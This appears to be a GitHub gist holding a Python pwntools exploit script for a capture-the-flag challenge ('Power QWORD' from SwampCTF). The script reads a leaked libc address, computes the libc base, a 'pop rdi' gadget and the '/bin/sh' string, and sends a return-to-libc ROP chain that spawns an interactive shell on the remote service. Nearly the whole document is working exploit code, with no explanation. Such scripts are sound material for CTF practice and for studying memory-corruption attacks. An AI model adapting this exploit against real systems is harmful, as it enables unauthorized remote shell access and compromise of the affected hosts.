Skip to content

Instantly share code, notes, and snippets.

@vitapluvia

vitapluvia/power-client.py

Created April 2, 2018 08:30
Show Gist options
  • Save vitapluvia/938b1f65289f84553b6863c37cf4b0bb to your computer and use it in GitHub Desktop.
Save vitapluvia/938b1f65289f84553b6863c37cf4b0bb to your computer and use it in GitHub Desktop.
Download ZIP
Client for SwampCTF's Power QWORD challenge
Raw
power-client.py
#!/usr/bin/env python
import os
from pwn import *
from pwnlib.util.safeeval import const
libc = ELF('./libc.so.6')
context(terminal = ['tmux', 'splitw'])
context.bits = 64
if (args.DEBUG):
r = process('power')
gdb.attach(r, 'c')
else:
r = remote('chal1.swampctf.com', 1999)
def main():
print(r.recvuntil(': '))
r.send('yes\n')
print r.recvuntil('the mage hands you')
leak = r.recvuntil(']').lstrip(' ').rstrip(']')
print r.recvuntil('QWord:')
system = const(leak)
base = system - libc.symbols['__libc_system']
gets = base + libc.symbols['_IO_gets']
binsh = base + libc.search('/bin/sh').next()
pop_rdi = base + libc.search(asm('pop rdi; ret;')).next()
print 'base: {}'.format(hex(base))
print 'pop rdi: {}'.format(hex(pop_rdi))
print 'system: {}'.format(hex(system))
print '/bin/sh: {}'.format(hex(binsh))
payload = p64(gets) + p64(pop_rdi) + p64(binsh) + p64(system)
r.sendline(payload)
r.interactive()
if __name__ == "__main__":
main()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment